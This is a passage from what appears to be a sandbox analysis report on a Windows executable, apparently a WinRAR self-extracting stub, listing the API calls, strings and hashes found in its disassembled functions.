                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                            • String ID: csm
                                                            • API String ID: 1170836740-1018135373
                                                            • Opcode ID: a4ccf7d0eba24dd13e111a3d538dcab678cdf11c33181fd9ed4ce9a78f7dadca
                                                            • Instruction ID: 277ca5a32a222163c0bdd9f36c859f3c2d0ae935ba1521cbb7195cda18efffbb
                                                            • Opcode Fuzzy Hash: a4ccf7d0eba24dd13e111a3d538dcab678cdf11c33181fd9ed4ce9a78f7dadca
                                                            • Instruction Fuzzy Hash: AC41B330A0020CAFCF10DF68C885AAEBBF5EF44324F14C1A5E915AB392D7719A19CF91
                                                            APIs
                                                            • ShowWindow.USER32(?,00000000), ref: 00BE9EEE
                                                            • GetWindowRect.USER32(?,00000000), ref: 00BE9F44
                                                            • ShowWindow.USER32(?,00000005,00000000), ref: 00BE9FDB
                                                            • SetWindowTextW.USER32(?,00000000), ref: 00BE9FE3
                                                            • ShowWindow.USER32(00000000,00000005), ref: 00BE9FF9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Window$Show$RectText
                                                            • String ID: RarHtmlClassName
                                                            • API String ID: 3937224194-1658105358
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                            • API String ID: 176396367-3743748572
                                                            APIs
                                                              • Part of subcall function 00BFC868: _free.LIBCMT ref: 00BFC891
                                                            • _free.LIBCMT ref: 00BFC8F2
                                                              • Part of subcall function 00BF8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BFC896,?,00000000,?,00000000,?,00BFC8BD,?,00000007,?,?,00BFCCBA,?), ref: 00BF8DE2
                                                              • Part of subcall function 00BF8DCC: GetLastError.KERNEL32(?,?,00BFC896,?,00000000,?,00000000,?,00BFC8BD,?,00000007,?,?,00BFCCBA,?,?), ref: 00BF8DF4
                                                            • _free.LIBCMT ref: 00BFC8FD
                                                            • _free.LIBCMT ref: 00BFC908
                                                            • _free.LIBCMT ref: 00BFC95C
                                                            • _free.LIBCMT ref: 00BFC967
                                                            • _free.LIBCMT ref: 00BFC972
                                                            • _free.LIBCMT ref: 00BFC97D
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00BEE669,00BEE5CC,00BEE86D), ref: 00BEE605
                                                            • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00BEE61B
                                                            • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00BEE630
                                                            Strings
                                                            Similarity
                                                            • API ID: AddressProc$HandleModule
                                                            • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                            • API String ID: 667068680-1718035505
                                                            APIs
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00BE14C2
                                                              • Part of subcall function 00BDB146: GetVersionExW.KERNEL32(?), ref: 00BDB16B
                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00BE14E6
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00BE1500
                                                            • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00BE1513
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00BE1523
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00BE1533
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion
                                                            • String ID:
                                                            • API String ID: 2092733347-0
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,00BF2AF1,00BF02FC,00BEFA34), ref: 00BF2B08
                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00BF2B16
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BF2B2F
                                                            • SetLastError.KERNEL32(00000000,00BF2AF1,00BF02FC,00BEFA34), ref: 00BF2B81
                                                            Similarity
                                                            • API ID: ErrorLastValue___vcrt_
                                                            • String ID:
                                                            • API String ID: 3852720340-0
                                                            APIs
                                                            • GetLastError.KERNEL32(?,00C11030,00BF4674,00C11030,?,?,00BF3F73,00000050,?,00C11030,00000200), ref: 00BF97E9
                                                            • _free.LIBCMT ref: 00BF981C
                                                            • _free.LIBCMT ref: 00BF9844
                                                            • SetLastError.KERNEL32(00000000,?,00C11030,00000200), ref: 00BF9851
                                                            • SetLastError.KERNEL32(00000000,?,00C11030,00000200), ref: 00BF985D
                                                            • _abort.LIBCMT ref: 00BF9863
                                                            Similarity
                                                            • API ID: ErrorLast$_free$_abort
                                                            • String ID:
                                                            • API String ID: 3160817290-0
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00BEDC47
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BEDC61
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BEDC72
                                                            • TranslateMessage.USER32(?), ref: 00BEDC7C
                                                            • DispatchMessageW.USER32(?), ref: 00BEDC86
                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00BEDC91
                                                            Similarity
                                                            • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                            • String ID:
                                                            • API String ID: 2148572870-0
                                                            APIs
                                                              • Part of subcall function 00BE05DA: _wcslen.LIBCMT ref: 00BE05E0
                                                              • Part of subcall function 00BDB92D: _wcsrchr.LIBVCRUNTIME ref: 00BDB944
                                                            • _wcslen.LIBCMT ref: 00BDC197
                                                            • _wcslen.LIBCMT ref: 00BDC1DF
                                                            Strings
                                                            Similarity
                                                            • API ID: _wcslen$_wcsrchr
                                                            • String ID: .exe$.rar$.sfx
                                                            • API String ID: 3513545583-31770016
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000800,?), ref: 00BECE9D
                                                              • Part of subcall function 00BDB690: _wcslen.LIBCMT ref: 00BDB696
                                                            • _swprintf.LIBCMT ref: 00BECED1
                                                              • Part of subcall function 00BD4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BD40A5
                                                            • SetDlgItemTextW.USER32(?,00000066,00C1946A), ref: 00BECEF1
                                                            • EndDialog.USER32(?,00000001), ref: 00BECFFE
                                                            Strings
                                                            Similarity
                                                            • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                            • String ID: %s%s%u
                                                            • API String ID: 110358324-1360425832
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00BDBB27
                                                            • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00BDA275,?,?,00000800,?,00BDA23A,?,00BD755C), ref: 00BDBBC5
                                                            • _wcslen.LIBCMT ref: 00BDBC3B
                                                            Strings
                                                            Similarity
                                                            • API ID: _wcslen$CurrentDirectory
                                                            • String ID: UNC$\\?\
                                                            • API String ID: 3341907918-253988292
                                                            APIs
                                                            • LoadBitmapW.USER32(00000065), ref: 00BEB6ED
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 00BEB712
                                                            • DeleteObject.GDI32(00000000), ref: 00BEB744
                                                            • DeleteObject.GDI32(00000000), ref: 00BEB767
                                                              • Part of subcall function 00BEA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00BEB73D,00000066), ref: 00BEA6D5
                                                              • Part of subcall function 00BEA6C2: SizeofResource.KERNEL32(00000000,?,?,?,00BEB73D,00000066), ref: 00BEA6EC
                                                              • Part of subcall function 00BEA6C2: LoadResource.KERNEL32(00000000,?,?,?,00BEB73D,00000066), ref: 00BEA703
                                                              • Part of subcall function 00BEA6C2: LockResource.KERNEL32(00000000,?,?,?,00BEB73D,00000066), ref: 00BEA712
                                                              • Part of subcall function 00BEA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00BEB73D,00000066), ref: 00BEA72D
                                                              • Part of subcall function 00BEA6C2: GlobalLock.KERNEL32(00000000), ref: 00BEA73E
                                                              • Part of subcall function 00BEA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00BEA762
                                                              • Part of subcall function 00BEA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00BEA7A7
                                                              • Part of subcall function 00BEA6C2: GlobalUnlock.KERNEL32(00000000), ref: 00BEA7C6
                                                              • Part of subcall function 00BEA6C2: GlobalFree.KERNEL32(00000000), ref: 00BEA7CD
                                                            Strings
                                                            Similarity
                                                            • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                            • String ID: ]
                                                            • API String ID: 1797374341-3352871620
                                                            APIs
                                                              • Part of subcall function 00BD1316: GetDlgItem.USER32(00000000,00003021), ref: 00BD135A
                                                              • Part of subcall function 00BD1316: SetWindowTextW.USER32(00000000,00C035F4), ref: 00BD1370
                                                            • EndDialog.USER32(?,00000001), ref: 00BED64B
                                                            • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00BED661
                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 00BED675
                                                            • SetDlgItemTextW.USER32(?,00000068), ref: 00BED684
                                                            Strings
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: RENAMEDLG
                                                            • API String ID: 445417207-3299779563
                                                            APIs
                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00BF7E24,00000000,?,00BF7DC4,00000000,00C0C300,0000000C,00BF7F1B,00000000,00000002), ref: 00BF7E93
                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BF7EA6
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00BF7E24,00000000,?,00BF7DC4,00000000,00C0C300,0000000C,00BF7F1B,00000000,00000002), ref: 00BF7EC9
                                                            Strings
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            APIs
                                                              • Part of subcall function 00BE081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00BE0836
                                                              • Part of subcall function 00BE081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00BDF2D8,Crypt32.dll,00000000,00BDF35C,?,?,00BDF33E,?,?,?), ref: 00BE0858
                                                            • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00BDF2E4
                                                            • GetProcAddress.KERNEL32(00C181C8,CryptUnprotectMemory), ref: 00BDF2F4
                                                            Strings
                                                            Similarity
                                                            • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                            • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                            • API String ID: 2141747552-1753850145
                                                            APIs
                                                            Similarity
                                                            • API ID: AdjustPointer$_abort
                                                            • String ID:
                                                            • API String ID: 2252061734-0
                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32 ref: 00BFBF39
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BFBF5C
                                                              • Part of subcall function 00BF8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BFCA2C,00000000,?,00BF6CBE,?,00000008,?,00BF91E0,?,?,?), ref: 00BF8E38
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00BFBF82
                                                            • _free.LIBCMT ref: 00BFBF95
                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00BFBFA4
                                                            Similarity
                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                            • String ID:
                                                            • API String ID: 336800556-0
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,?,00BF91AD,00BFB188,?,00BF9813,00000001,00000364,?,00BF3F73,00000050,?,00C11030,00000200), ref: 00BF986E
                                                            • _free.LIBCMT ref: 00BF98A3
                                                            • _free.LIBCMT ref: 00BF98CA
                                                            • SetLastError.KERNEL32(00000000,?,00C11030,00000200), ref: 00BF98D7
                                                            • SetLastError.KERNEL32(00000000,?,00C11030,00000200), ref: 00BF98E0
                                                            Similarity
                                                            • API ID: ErrorLast$_free
                                                            • String ID:
                                                            • API String ID: 3170660625-0
                                                            APIs
                                                              • Part of subcall function 00BE11CF: ResetEvent.KERNEL32(?), ref: 00BE11E1
                                                              • Part of subcall function 00BE11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00BE11F5
                                                            • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00BE0F21
                                                            • CloseHandle.KERNEL32(?,?), ref: 00BE0F3B
                                                            • DeleteCriticalSection.KERNEL32(?), ref: 00BE0F54
                                                            • CloseHandle.KERNEL32(?), ref: 00BE0F60
                                                            • CloseHandle.KERNEL32(?), ref: 00BE0F6C
                                                              • Part of subcall function 00BE0FE4: WaitForSingleObject.KERNEL32(?,000000FF,00BE1206,?), ref: 00BE0FEA
                                                              • Part of subcall function 00BE0FE4: GetLastError.KERNEL32(?), ref: 00BE0FF6
                                                            Similarity
                                                            • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                            • String ID:
                                                            • API String ID: 1868215902-0
                                                            APIs
                                                            • _free.LIBCMT ref: 00BFC817
                                                              • Part of subcall function 00BF8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BFC896,?,00000000,?,00000000,?,00BFC8BD,?,00000007,?,?,00BFCCBA,?), ref: 00BF8DE2
                                                              • Part of subcall function 00BF8DCC: GetLastError.KERNEL32(?,?,00BFC896,?,00000000,?,00000000,?,00BFC8BD,?,00000007,?,?,00BFCCBA,?,?), ref: 00BF8DF4
                                                            • _free.LIBCMT ref: 00BFC829
                                                            • _free.LIBCMT ref: 00BFC83B
                                                            • _free.LIBCMT ref: 00BFC84D
                                                            • _free.LIBCMT ref: 00BFC85F
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00BE1FE5
                                                            • _wcslen.LIBCMT ref: 00BE1FF6
                                                            • _wcslen.LIBCMT ref: 00BE2006
                                                            • _wcslen.LIBCMT ref: 00BE2014
                                                            • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00BDB371,?,?,00000000,?,?,?), ref: 00BE202F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$CompareString
                                                            • String ID:
                                                            • API String ID: 3397213944-0
                                                            APIs
                                                            • _free.LIBCMT ref: 00BF891E
                                                              • Part of subcall function 00BF8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BFC896,?,00000000,?,00000000,?,00BFC8BD,?,00000007,?,?,00BFCCBA,?), ref: 00BF8DE2
                                                              • Part of subcall function 00BF8DCC: GetLastError.KERNEL32(?,?,00BFC896,?,00000000,?,00000000,?,00BFC8BD,?,00000007,?,?,00BFCCBA,?,?), ref: 00BF8DF4
                                                            • _free.LIBCMT ref: 00BF8930
                                                            • _free.LIBCMT ref: 00BF8943
                                                            • _free.LIBCMT ref: 00BF8954
                                                            • _free.LIBCMT ref: 00BF8965
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            Similarity
                                                            • API ID: _swprintf
                                                            • String ID: %ls$%s: %s
                                                            • API String ID: 589789837-2259941744
                                                            APIs
                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\7aHY4r6vXR.exe,00000104), ref: 00BF7FAE
                                                            • _free.LIBCMT ref: 00BF8079
                                                            • _free.LIBCMT ref: 00BF8083
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            Similarity
                                                            • API ID: _free$FileModuleName
                                                            • String ID: C:\Users\user\Desktop\7aHY4r6vXR.exe
                                                            • API String ID: 2506810119-821618498
                                                            APIs
                                                            • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00BF31FB
                                                            • _abort.LIBCMT ref: 00BF3306
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            Similarity
                                                            • API ID: EncodePointer_abort
                                                            • String ID: MOC$RCC
                                                            • API String ID: 948111806-2084237596
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00BD7406
                                                              • Part of subcall function 00BD3BBA: __EH_prolog.LIBCMT ref: 00BD3BBF
                                                            • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00BD74CD
                                                              • Part of subcall function 00BD7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00BD7AAB
                                                              • Part of subcall function 00BD7A9C: GetLastError.KERNEL32 ref: 00BD7AF1
                                                              • Part of subcall function 00BD7A9C: CloseHandle.KERNEL32(?), ref: 00BD7B00
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            Similarity
                                                            • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                            • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                            • API String ID: 3813983858-639343689
                                                            APIs
                                                              • Part of subcall function 00BD1316: GetDlgItem.USER32(00000000,00003021), ref: 00BD135A
                                                              • Part of subcall function 00BD1316: SetWindowTextW.USER32(00000000,00C035F4), ref: 00BD1370
                                                            • EndDialog.USER32(?,00000001), ref: 00BEAD98
                                                            • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00BEADAD
                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 00BEADC2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: ASKNEXTVOL
                                                            • API String ID: 445417207-3402441367
                                                            APIs
                                                            • __fprintf_l.LIBCMT ref: 00BDD954
                                                            • _strncpy.LIBCMT ref: 00BDD99A
                                                              • Part of subcall function 00BE1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00C11030,00000200,00BDD928,00000000,?,00000050,00C11030), ref: 00BE1DC4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                            • String ID: $%s$@%s
                                                            • API String ID: 562999700-834177443
                                                            APIs
                                                            • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00BDAC5A,00000008,?,00000000,?,00BDD22D,?,00000000), ref: 00BE0E85
                                                            • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00BDAC5A,00000008,?,00000000,?,00BDD22D,?,00000000), ref: 00BE0E8F
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00BDAC5A,00000008,?,00000000,?,00BDD22D,?,00000000), ref: 00BE0E9F
                                                            Strings
                                                            • Thread pool initialization failed., xrefs: 00BE0EB7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            Similarity
                                                            • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                            • String ID: Thread pool initialization failed.
                                                            • API String ID: 3340455307-2182114853
                                                            APIs
                                                              • Part of subcall function 00BD1316: GetDlgItem.USER32(00000000,00003021), ref: 00BD135A
                                                              • Part of subcall function 00BD1316: SetWindowTextW.USER32(00000000,00C035F4), ref: 00BD1370
                                                            • EndDialog.USER32(?,00000001), ref: 00BEB2BE
                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00BEB2D6
                                                            • SetDlgItemTextW.USER32(?,00000067,?), ref: 00BEB304
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: GETPASSWORD1
                                                            • API String ID: 445417207-3292211884
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RENAMEDLG$REPLACEFILEDLG
                                                            • API String ID: 0-56093855
                                                            APIs
                                                            Similarity
                                                            • API ID: __alldvrm$_strrchr
                                                            • String ID:
                                                            • API String ID: 1036877536-0
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00BD7F69,?,?,?), ref: 00BDA3FA
                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00BD7F69,?), ref: 00BDA43E
                                                            • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00BD7F69,?,?,?,?,?,?,?), ref: 00BDA4BF
                                                            • CloseHandle.KERNEL32(?,?,?,00000800,?,00BD7F69,?,?,?,?,?,?,?,?,?,?), ref: 00BDA4C6
                                                            Similarity
                                                            • API ID: File$Create$CloseHandleTime
                                                            • String ID:
                                                            • API String ID: 2287278272-0
                                                            APIs
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID:
                                                            • API String ID: 176396367-0
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00BF91E0,?,00000000,?,00000001,?,?,00000001,00BF91E0,?), ref: 00BFC9D5
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00BFCA5E
                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00BF6CBE,?), ref: 00BFCA70
                                                            • __freea.LIBCMT ref: 00BFCA79
                                                              • Part of subcall function 00BF8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BFCA2C,00000000,?,00BF6CBE,?,00000008,?,00BF91E0,?,?,?), ref: 00BF8E38
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                            • String ID:
                                                            • API String ID: 2652629310-0
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 00BEA666
                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 00BEA675
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BEA683
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00BEA691
                                                            Similarity
                                                            • API ID: CapsDevice$Release
                                                            • String ID:
                                                            • API String ID: 1035833867-0
                                                            APIs
                                                              • Part of subcall function 00BEA699: GetDC.USER32(00000000), ref: 00BEA69D
                                                              • Part of subcall function 00BEA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00BEA6A8
                                                              • Part of subcall function 00BEA699: ReleaseDC.USER32(00000000,00000000), ref: 00BEA6B3
                                                            • GetObjectW.GDI32(?,00000018,?), ref: 00BEA83C
                                                              • Part of subcall function 00BEAAC9: GetDC.USER32(00000000), ref: 00BEAAD2
                                                              • Part of subcall function 00BEAAC9: GetObjectW.GDI32(?,00000018,?), ref: 00BEAB01
                                                              • Part of subcall function 00BEAAC9: ReleaseDC.USER32(00000000,?), ref: 00BEAB99
                                                            Strings
                                                            Similarity
                                                            • API ID: ObjectRelease$CapsDevice
                                                            • String ID: (
                                                            • API String ID: 1061551593-3887548279
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00BD75E3
                                                              • Part of subcall function 00BE05DA: _wcslen.LIBCMT ref: 00BE05E0
                                                              • Part of subcall function 00BDA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00BDA598
                                                            • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00BD777F
                                                              • Part of subcall function 00BDA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00BDA325,?,?,?,00BDA175,?,00000001,00000000,?,?), ref: 00BDA501
                                                              • Part of subcall function 00BDA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00BDA325,?,?,?,00BDA175,?,00000001,00000000,?,?), ref: 00BDA532
                                                            Strings
                                                            Similarity
                                                            • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                            • String ID: :
                                                            • API String ID: 3226429890-336475711
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: }
                                                            • API String ID: 176396367-4239843852
                                                            APIs
                                                              • Part of subcall function 00BDF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00BDF2E4
                                                              • Part of subcall function 00BDF2C5: GetProcAddress.KERNEL32(00C181C8,CryptUnprotectMemory), ref: 00BDF2F4
                                                            • GetCurrentProcessId.KERNEL32(?,?,?,00BDF33E), ref: 00BDF3D2
                                                            Strings
                                                            • CryptProtectMemory failed, xrefs: 00BDF389
                                                            • CryptUnprotectMemory failed, xrefs: 00BDF3CA
                                                            Similarity
                                                            • API ID: AddressProc$CurrentProcess
                                                            • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                            • API String ID: 2190909847-396321323
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 00BDB9B8
                                                              • Part of subcall function 00BD4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BD40A5
                                                            Strings
                                                            Similarity
                                                            • API ID: __vswprintf_c_l_swprintf
                                                            • String ID: %c:\
                                                            • API String ID: 1543624204-3142399695
                                                            APIs
                                                            • CreateThread.KERNEL32(00000000,00010000,00BE1160,?,00000000,00000000), ref: 00BE1043
                                                            • SetThreadPriority.KERNEL32(?,00000000), ref: 00BE108A
                                                              • Part of subcall function 00BD6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BD6C54
                                                            Strings
                                                            Similarity
                                                            • API ID: Thread$CreatePriority__vswprintf_c_l
                                                            • String ID: CreateThread failed
                                                            • API String ID: 2655393344-3849766595
                                                            APIs
                                                              • Part of subcall function 00BDE2E8: _swprintf.LIBCMT ref: 00BDE30E
                                                              • Part of subcall function 00BDE2E8: _strlen.LIBCMT ref: 00BDE32F
